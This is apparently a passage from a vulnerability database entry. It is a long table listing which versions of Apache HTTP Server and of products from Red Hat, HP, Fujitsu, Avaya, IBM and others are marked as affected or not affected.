vendor: | apache | model: | apache | scope: | eq | version: | 2.2.14 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.13 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.12 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.11 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.10 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.9 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.8 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.6 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.5 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.4 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.3 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.2 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.63 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.61 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.60 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.59 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.58 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.57 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.56 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.55 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.54 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.53 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.52 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.51 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.50 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.49 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.48 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.47 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.46 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.45 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.44 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.43 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.42 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.41 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.40 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.39 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.38 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.37 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.36 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.35 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.32 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.28 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.21 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.20 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.19 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.18 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.17 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.2.16 | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | eq | version: | 2.0.64 | Trust: 0.3 |
vendor: | sophos | model: | web appliance | scope: | ne | version: | 3.8.1.1 | Trust: 0.3 |
vendor: | sophos | model: | web appliance | scope: | ne | version: | 3.7.9.1 | Trust: 0.3 |
vendor: | juniper | model: | nsm appliance generic offline for centos | scope: | ne | version: | 51 | Trust: 0.3 |
vendor: | juniper | model: | junos space 13.1r1.6 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | ibm | model: | storwize unified | scope: | ne | version: | v70001.40 | Trust: 0.3 |
vendor: | ibm | model: | storwize unified | scope: | ne | version: | v70001.3.23 | Trust: 0.3 |
vendor: | hp | model: | xp provisioning manager | scope: | ne | version: | 7.0.0-00 | Trust: 0.3 |
vendor: | hp | model: | xp p9000 command view advanced edition | scope: | ne | version: | 7.4.1-00 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | ne | version: | 7.1.1 | Trust: 0.3 |
vendor: | hp | model: | p9000 tiered storage manager | scope: | ne | version: | 7.4.1-00 | Trust: 0.3 |
vendor: | hp | model: | p9000 replication manager | scope: | ne | version: | 7.4.1-00 | Trust: 0.3 |
vendor: | hp | model: | onboard administrator | scope: | ne | version: | 3.56 | Trust: 0.3 |
vendor: | apple | model: | mac os | scope: | ne | version: | x10.8.2 | Trust: 0.3 |
vendor: | apple | model: | mac os | scope: | ne | version: | x10.7.5 | Trust: 0.3 |
vendor: | apache | model: | 2.2.22-dev | scope: | ne | version: | - | Trust: 0.3 |
vendor: | apache | model: | apache | scope: | ne | version: | 2.0.65 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux ws | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux es | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop version | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | red | model: | hat jboss enterprise web server for rhel | scope: | eq | version: | 61.0 | Trust: 0.3 |
vendor: | red | model: | hat jboss enterprise web server for rhel server | scope: | eq | version: | 51.0 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux workstation | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux server | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux hpc node optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux hpc node | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux desktop optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux desktop | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux desktop client | scope: | eq | version: | 5 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux as | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux server | scope: | eq | version: | 5 | Trust: 0.3 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | oracle | model: | application server 10g r3 | scope: | eq | version: | 10.1.3.5.0 | Trust: 0.3 |
vendor: | mandriva | model: | linux mandrake x86 64 | scope: | eq | version: | 2009.0 | Trust: 0.3 |
vendor: | mandriva | model: | linux mandrake | scope: | eq | version: | 2009.0 | Trust: 0.3 |
vendor: | ibm | model: | os/400 v6r1m0 | scope: | - | version: | - | Trust: 0.3 |
vendor: | ibm | model: | os/400 v5r5m0 | scope: | - | version: | - | Trust: 0.3 |
vendor: | ibm | model: | os/400 v5r4m0 | scope: | - | version: | - | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 7.0.11 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 7.0.0.5 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 7.0.0.19 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 7.0.0.17 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 7.0.0.15 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 7.0.0.13 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.2.27 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.0.96 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 3.0.2.77 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 3.0.1.73 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 3.0.68 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 3.0.64 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.2.0-12 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.1.0.103 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.1.0.102 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.1.0-103 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.0.0.95 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.0.0-95 | Trust: 0.3 |
vendor: | hp | model: | system management homepage b | scope: | eq | version: | 3.0.2.77 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 3.0.2-77 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 3.0.1-73 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 3.0.0-68 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | hp | model: | openvms secure web server | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition l10 | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition l10a | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition l10 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server web-j edition l20a | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server web-j edition l20 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server web-j edition l11 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server web-j edition l10b | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server web-j edition l10a | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server web-j edition l10 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server web-j edition | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 9.2 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 9.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition b | scope: | eq | version: | 9.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 9.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition b | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition a | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0.3 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0.2 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition 9.1.0b | scope: | - | version: | - | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard edition l20a | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard edition l20 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard edition l11 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard edition l10b | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard edition l10a | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard edition l10 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard edition | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer | scope: | eq | version: | 5.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer l10 | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer l10 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer l20 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 7.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 6.0.2 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 6.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 5.1.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 5.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus l11 | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus l10 | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus l11 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus l10c | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus l10b | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus l10a | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus l10 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 9.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition b | scope: | eq | version: | 9.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 9.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition b | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0.3 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 6.0.2 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 6.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 5.1.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 5.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition 9.1.0b | scope: | - | version: | - | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition 9.1.0a | scope: | - | version: | - | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l11 | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l10 | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition 6.0a | scope: | - | version: | - | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l10c | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l10b | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l10 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l20a | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l20 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l11 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l10b | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l10a | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition l10 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | avaya | model: | voice portal sp2 | scope: | eq | version: | 4.1 | Trust: 0.3 |
vendor: | avaya | model: | voice portal sp1 | scope: | eq | version: | 4.1 | Trust: 0.3 |
vendor: | avaya | model: | voice portal | scope: | eq | version: | 4.1 | Trust: 0.3 |
vendor: | avaya | model: | voice portal | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | avaya | model: | message networking | scope: | eq | version: | 5.2.1 | Trust: 0.3 |
vendor: | avaya | model: | message networking | scope: | eq | version: | 5.2.2 | Trust: 0.3 |
vendor: | avaya | model: | message networking sp1 | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | message networking | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | message networking | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange | scope: | eq | version: | 5.0.0.52 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange sp2 | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange sp1 | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange sp1 | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange sp2 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange sp1 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | avaya | model: | meeting exchange | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.1.3 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.1.2 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.1.1 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager sp2 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager sp1 | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager sp1 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | avaya | model: | aura sip enablement services | scope: | eq | version: | 5.2.1 | Trust: 0.3 |
vendor: | avaya | model: | aura sip enablement services | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | aura sip enablement services | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | avaya | model: | aura sip enablement services | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | avaya | model: | aura sip enablement services | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | avaya | model: | aura communication manager | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | avaya | model: | aura communication manager | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 4.2.3 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 4.2.2 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 4.2.1 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 4.0.1 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 3.1.6 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 3.1.5 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 3.1.4 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 3.1.3 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 4.2 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 4.1 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.3.6 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.3.5 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.3.4 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.3.2 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.3.1 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.3 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.15 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.14 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.13 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.12 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.11 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.10 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.9 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.8 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.6 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.5 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.4 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.3 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.2 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.9 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.8 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.7 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.6 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.5 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.4 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.3 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.2 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.1 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.63 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.61 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.60 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.59 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.58 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.57 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache -dev | scope: | eq | version: | 2.0.56 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.56 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.55 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.54 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.53 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.52 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.51 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.50 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.49 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.48 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.47 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.46 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.45 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.44 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.43 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.42 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.41 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.40 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.39 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.38 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.37 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.36 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.35 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache -beta | scope: | eq | version: | 2.0.34 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache -beta | scope: | eq | version: | 2.0.32 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.32 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache -beta | scope: | eq | version: | 2.0.28 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache beta | scope: | eq | version: | 2.0.28 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.28 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.9 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache a9 | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.68 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.65 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.42 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.41 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.39 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.38 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.37 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.36 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache -dev | scope: | eq | version: | 1.3.35 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.34 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.33 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.32 | Trust: 0.3 |
